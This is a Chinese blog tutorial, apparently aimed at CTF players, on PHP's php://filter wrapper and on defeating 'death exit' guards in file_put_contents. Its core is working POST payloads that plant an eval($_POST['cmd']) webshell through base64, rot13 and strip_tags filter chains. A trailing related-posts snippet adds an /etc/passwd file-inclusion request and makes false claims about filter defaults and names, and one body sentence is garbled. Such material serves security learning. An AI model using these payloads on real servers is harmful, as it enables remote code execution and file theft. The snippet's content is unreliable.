php://filter伪协议(总结)与死亡代码的绕过

原创 于 2025-08-15 13:41:09 发布 · 2.4k 阅读 · 65 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #web安全

文章目录


php伪协议想必大家都不陌生,因为在写ctf题目的时候我们经常在文件包含的时候使用到它。

比如下面这个payload:

php://filter/convert.base64-encode/resource=flag.php

这一串payload我们经常在想要获取源码的时候使用,但是伪协议具体是怎么构造的以及包含了哪些部分我们貌似很少有去想过。

下面我就来给大家重新介绍一下php://filter伪协议,以及如何利用这个伪协议绕过死亡代码。

php://filter总结

介绍

php://filter 是 PHP 中的一种伪协议,用于在读取或写入文件时对数据流进行过滤和转换。它允许你在不修改原始文件的情况下,对文件内容执行各种编码、解码或转换操作,常用于安全审计、数据处理或漏洞利用场景。

使用前提:开启了allow_url_fopen和allow_url_include

语法:php://filter/[读|写过滤器列表]/resource=目标文件

名称描述
resource=目标文件必须。用于指定你要筛选过滤的数据流。
read=<读链的筛选列表>可选。用于指定一个或多个过滤器名称,以管道符(`
write=<写链的筛选列表>可选。用于指定一个或多个过滤器名称,以管道符(`

过滤器

过滤器(Filter) 是一种用于处理数据流的程序或函数,它接收输入数据,对其进行特定转换或筛选,并输出处理后的结果。在php中,过滤器分为字符串过滤器、转换过滤器、压缩过滤器以及加密过滤器。

过滤器大全可以参考php手册里的内容https://www.php.net/manual/zh/filters.encryption.php

转换过滤器

作用:对数据流进行编码,通常用来读取文件源码。

常见的转换过滤器如下

convert.base64-encode:将内容 Base64 编码。
convert.base64-decode:将 Base64 内容解码。
convert.quoted-printable-encode:引号可打印编码。
convert.quoted-printable-decode:引号可打印解码。

convert.iconv.*:一种字符编码转换过滤器
语法;
convert.iconv.目标编码/源编码			convert.iconv.UTF-8/GBK	
convert.iconv.源编码.目标编码			convert.iconv.utf8.utf16
字符串过滤器

该类通常以string开头,对每个字符都进行同样方式的处理。

string.toupper:转为大写。
string.tolower:转为小写。
string.strip_tags:这个过滤器就比较有意思,用来处理掉读入的所有标签,例如XML的等等。在绕过死亡exit大有用处。
string.rot13:字符右移十三位。
加密过滤器

mcrypt.*/mdecrypt.*:使用 MCrypt 扩展进行加密 / 解密(PHP 7.2 + 已移除)

压缩过滤器

注意,这里的压缩过滤器指的并不是在数据流传入的时候对整个数据进行写入文件后压缩文件,也不代表可以压缩或者解压数据流。压缩过滤器不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。

用到的两个相关过滤器:zlib.deflate(压缩)和 zlib.inflate(解压)。zilb是比较主流的用法,至于bzip2.compress和 bzip2.decompress工作的方式与 zlib 过滤器大致相同。

php://filter/zlib.deflate|zlib.inflate/resource=flag.php
等同于
php://filter/resource=flag.php

常用的payload

php://filter/convert.base64-encode/resource=flag.php
php://filter/convert.base64-decode/resource=flag.php
php://filter/convert.quoted-printable-encode/resource=flag.php
php://filter/convert.iconv.UTF-8/GBK/resource=flag.php
php://filter/convert.iconv.UTF-8.UTF-16/resource=flag.php
php://filter/zlib.deflate|zlib.inflate/resource=flag.php
php://filter/bzip2.compress/resource=flag.php
php://filter/string.rot13/resource=flag.php
php://filter/string.tolower/resource=flag.php

绕过死亡exit

什么是死亡exit?

我们看如下的代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);

可以看到在 c o n t e n t 的开头有一段 e x i t 的过程,这个时候我们写入一句话木马并拼接 content的开头有一段exit的过程,这个时候我们写入一句话木马并拼接 content的开头有一段exit的过程,这个时候我们写入一句话木马并拼接content

里后会发现,由于开头一直有一个exit的存在,会使得我们的一句话木马并不会被执行。(这个过程在实战中十分常见,通常出现在缓存、配置文件等等地方,不允许用户直接访问的文件,都会被加上if(!defined(xxx))exit;之类的限制)。那么这种情况下,我们怎么绕过exit让我们的一句话木马生效呢??

幸运的是,file_put_contents()函数中,第一个参数是可以使用php伪协议的,也就是说我们可以借助php://filter协议以及各种过滤器来达到某些效果。以下是两种最常见的绕过方式。

base64绕过

众所周知,base64为什么叫base64?那是因为它只能使用a-zA-Z0-9以及+/这64个字符进行编码,所以如果对不在这64个字符里的字符串进行base64解码的话,便会直接忽略。

一个正常的base64_decode实际上可以理解为如下两个步骤:

<?php
$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);
base64_decode($_GET['txt']);

又因为$content开头的死亡代码中包含<?; ?>这些字符,而这些字符并不在64个字符里,所以对其进行base64解码便会忽略掉这些字符,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。

“phpexit”一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,"phpexita"被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是<?php exit; ?>没有了。

这里便可以使用php://filter伪协议来达到解码的效果,payload如下

# POST
filename=php://filter/write=convert.base64-decode/resource=kirito.php&txt=aPD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==

PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==其实就是一句话木马的base64编码。

注意一定要在开头加上个a,来凑满8个字符满足base64解码要求。

最后效果如下

image-20250720210012259

可以看到解码后,前面的死亡代码变成了乱码,而后面的一句话木马还是正常的,都变乱码了自然不会被解析。尝试用Webshell工具连接一下

image-20250720210233380

非常完美,成功连接

string.rot13绕过

string.rot13是常用的字符串过滤器,作用是右移13位也就是rot13编码。

<?php exit; ?>在经过rot13编码后会变成<?cuc rkvg; ?>

在PHP不开启short_open_tag时,php不认识这个字符串,当然也就不会执行了。

当然我们写入的一句话木马要求是经过rot13编码后恢复原状

payload如下

filename=php://filter/write=string.rot13/resource=kirito.php&txt=<?cuc riny($_CBFG['pzq']);?>

效果如下

image-20250720212045730

尝试使用Webshell工具连接

image-20250720212143303

非常完美的连接上了,可以看到前面的那一串php引擎根本不识别。

string.strip_tags与base64组合拳绕过

string.strip_tags也是字符串过滤器,作用是用来处理掉读入的所有标签。

比如说

<?php exit;?>Test

经过string.strip_tags以后
Test

可见,<?php exit; ?>被去除了。但回到上面的题目,我们最终的目的是写入一个webshell,而写入的webshell也是php代码,如果使用strip_tags同样会被去除。

这个时候我们便可以使用组合技能,也就是同时使用string.strip_tags与convert.base64-decode过滤器。这样我们只需要传入的一句话木马是base64编码过的,便不会被string.strip_tags给去除掉,然后再经过base64解码后恢复原状。

payload如下:

filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=kirito.php&txt=PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==

这个时候的txt开头就不需要加a了

效果如下:

image-20250720215443060

非常完美,只有一句话木马,没有任何多余的。

用Webshell工具连接试试。

image-20250720215526552

成功连接。


以上便是最常用的三种绕过死亡exit的方式。

三种绕过方式皆学自p神博客里的文章

谈一谈php://filter的妙用

还有更多的绕过技巧可以参考下面这篇博客

file_put_content和死亡·杂糅代码之缘

php://filter伪协议(总结)
leekos的博客,分享web安全相关知识~
01-07 1万+
php://filter伪协议(总结)
php://filterctf
m0_73973498的博客
10-11 953
这篇博客主要介绍的是php//filter在ctf中的常见利用,关于php:/filter的介绍可以去下面这篇博客,讲解的非常详细。
浅谈 filter伪协议的特性
qq_64201116的博客
07-22 3407
对我来说,我以前对filter伪协议不甚了解,这次接触了这一题,就得主动去更加深入地了解一下filter伪协议了。以前呢就知道php//filter/read=convert.base64-encode/resource=[文件名]这干瘪瘪的一套,用就完了,现在看来深入了解是很有必要的。......
PHP伪协议filter详解,php://filter协议过滤器
wangyuxiang946的博客
06-12 1万+
PHP://filter协议 PHP filter 过滤器
PHP 伪协议:使用 php://filter 为数据流应用过滤器
两个月亮
10-07 5904
php://filter 的主要作用是提供一种机制,让您可以轻松地在数据流上应用一个或多个过滤器。convert.base64-encode convert.base64-decode 是 php://filter 所支持的过滤器,使用这两个过滤器等同于使用 base64_encode() base64_decode() 对数据流进行处理。在为 php://filter 指定过滤器时,可以通过 管道符 | 指定多个过滤器(过滤器列表),这些过滤器将按照 从左至右 的顺序 依次 对数据流进行处理。
详解php://filter以及死亡绕过
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
php://filter技术分享
Pz_mstr's Blog
10-13 4553
0x00 前言php://filterPHP中的一个协议,利用这个协议我们可以解决一些ctf的题目,或者挖掘出一些漏洞。0x01 php://filterphp://filter可以作为一个中间流来处理其他流,具有四个参数: 名称 描述 备注 resource=<要过滤的数据流> 指定了你要筛选过滤的数据流。 必选 read=<读链的筛选列表> 可以设定一个或多个过滤
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 9149
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
文件包含中伪协议的利用
E1even的博客
06-22 2005
文件包含一直没有整理知识,今天就用这篇文章梳理一下解题吧 伪协议: 首先说一下:./ …/的区别: ./是:当前目录 …/是父级目录 fillter、file用来读取文件源码: filter协议用于读取源码居多,读取路径是相对路径,较为轻松。一般拿来读取index.php源码 ?file=php://filter/read=convert.base64-encode/resource=./flag.php 这里说一下,php这里可以大写 例如: 使用filter读取源码,方便我们下一步 说说file协
PHP伪协议(封装协议/内置协议)
m0_52923241的博客
07-23 1758
PHP内置协议/封装协议/伪协议 PHP带有很多内置URL风格的封装协议,这类协议fopen()、copy()、file_exists()、filesize()等文件系统函数所提供的功能类似;可结合文件包含进行漏洞利用 PHP封装协议: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397)
[羊城杯 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)
oZuoShen123的博客
10-08 1285
F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! ! 意思就是http协议就能进ser.php,回顾一下http协议咋用的?……
php://filter/
小龙在线
09-07 915
php://filterphp中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字filter可以很容易想到这个协议可以用来过滤一些东西。
详解php://filter伪协议的浅知识点
m0_75178803的博客
04-09 573
通过file协议可以访问本地文件系统,读取到文件的内容可以获取指定文件源码。当它包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取通过 include 或 require 语句,可将 PHP 文件内容插入另一个 PHP 文件(在服务器执行它之前)。include 和 require 语句相同,但在错误处理方面:require 会生成致命错误,并停止脚本include 只生成警告,并且脚本会继续。
php://filter
2202_75317918的博客
04-12 4144
php://filter
-------已搬运------php://filter 绕过死亡file_put_content() base64 的编码小trick
Zero_Adam的博客
04-26 5644
目录:base64编码了解???一、死亡绕过的三种题目形式:首先对于第一种情况:1. base64编码绕过:2. rot13编码绕过3. .htaccess的预包含利用。4. 过滤器编码组合拳 base64编码了解??? 这几个文章 都要学习吸收一下: php://filter中的各种过滤器: 探索php://filter在实战当中的奇技淫巧 一、死亡绕过的三种题目形式: 针对file_put_content()。进行exit()死亡结束的绕过方法: 三种情况: file_put_contents($fil
php filter 绕过,http请求绕过Filter的实现实例
weixin_30923925的博客
03-18 271
[导读]这篇文章主要介绍了http请求绕过Filter的实现实例的相关资料http请求绕过Filter的实现实例场景:两个web服务器,A当做服务端,B为客户端,B通过Hessian远程访问A。A上加了session过期filter,通过用户信息检查session是否过期。这种情况下,Hessian会先发给filterfilter读不到用户信息就会认为过期了,引起错误。解决方案:让hessian...
php://filter 的使用
热门推荐
hhh
09-03 3万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
PHP代码审计 ----- 伪协议
qq_62344745的博客
04-27 506
用于访问本地系统 不受 php.ini里的影响这两个开不开都行file = file://E:\XXX\1.txt 绝对路径读取1.txt文件,当作代码执行?
学习笔记-php伪协议
人饭子的博客
10-31 375
伪协议 相关文章 & Source & Reference PHP伪协议的妙用 filter协议 php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 re...
php://filter伪协议
最新发布
07-24
### ### php://filter 伪协议的使用方法及示例 `php://filter` 是 PHP 提供的一个特殊协议,用于在文件流操作中应用各种过滤器。它允许在读取或写入文件时对内容进行过滤或转换,适用于压缩、加密、解码、字符编码转换等场景。该协议在 CTF 比赛和安全测试中常用于读取 PHP 源码,绕过某些文件读取限制。 #### 使用方法 `php://filter` 的基本语法如下: ``` php://filter/[<过滤器名>:<参数>]/resource=<文件路径> ``` 其中 `<过滤器名>` 是可选的,若未指定则默认为 `string.rot13`;`<参数>` 可用于指定编码方式,如 `convert.base64-encode`;`<文件路径>` 是目标文件的路径。 例如,读取 `06.php` 文件的源代码并以 Base64 编码输出: ``` php://filter/convert.base64-encode/resource=06.php ``` 此方法常用于绕过 Web 服务器对 `.php` 文件的直接访问限制,通过 Base64 编码方式读取文件内容,再在客户端进行解码。 #### 常见用途示例 1. **读取 PHP 文件源码** 使用 `php://filter/convert.base64-encode` 可以将目标文件的内容进行 Base64 编码,从而绕过 Web 服务器的文件类型限制。例如: ```http GET /index.php?page=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1 Host: example.com ``` 服务器响应中将包含 Base64 编码的 `flag.php` 文件内容,解码后即可查看源码。 2. **字符编码转换** `php://filter` 还可用于字符编码转换,例如将文件内容从 UTF-8 转换为 UTF-16: ``` php://filter/convert.iconv.UTF-8.UTF-16/resource=data.txt ``` 3. **多层过滤器嵌套** 可以使用多个过滤器进行嵌套处理,例如先进行 Base64 编码,再进行 ROT13 转换: ``` php://filter/convert.base64-encode|convert.string.rot13/resource=data.txt ``` 4. **防御绕过文件包含漏洞利用** 在某些存在本地文件包含(LFI)漏洞的 PHP 应用中,攻击者可通过 `php://filter` 读取敏感文件内容。例如,若应用中存在如下代码: ```php include($_GET['page'] . '.php'); ``` 攻击者可构造如下请求读取 `/etc/passwd`: ```http GET /index.php?page=php://filter/resource=/etc/passwd HTTP/1.1 ``` 若服务器未正确配置,攻击者即可读取系统文件内容。 #### 安全建议 - **避免直接使用用户输入作为文件路径**:应使用白名单机制控制可包含的文件。 - **禁用危险的伪协议**:在 `php.ini` 中设置 `allow_url_include=Off`,防止远程文件包含。 - **限制文件读取权限**:确保 Web 服务器运行在低权限账户下,避免访问系统敏感文件。 - **输入过滤编码处理**:对用户输入进行严格校验,避免构造恶意路径。 ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值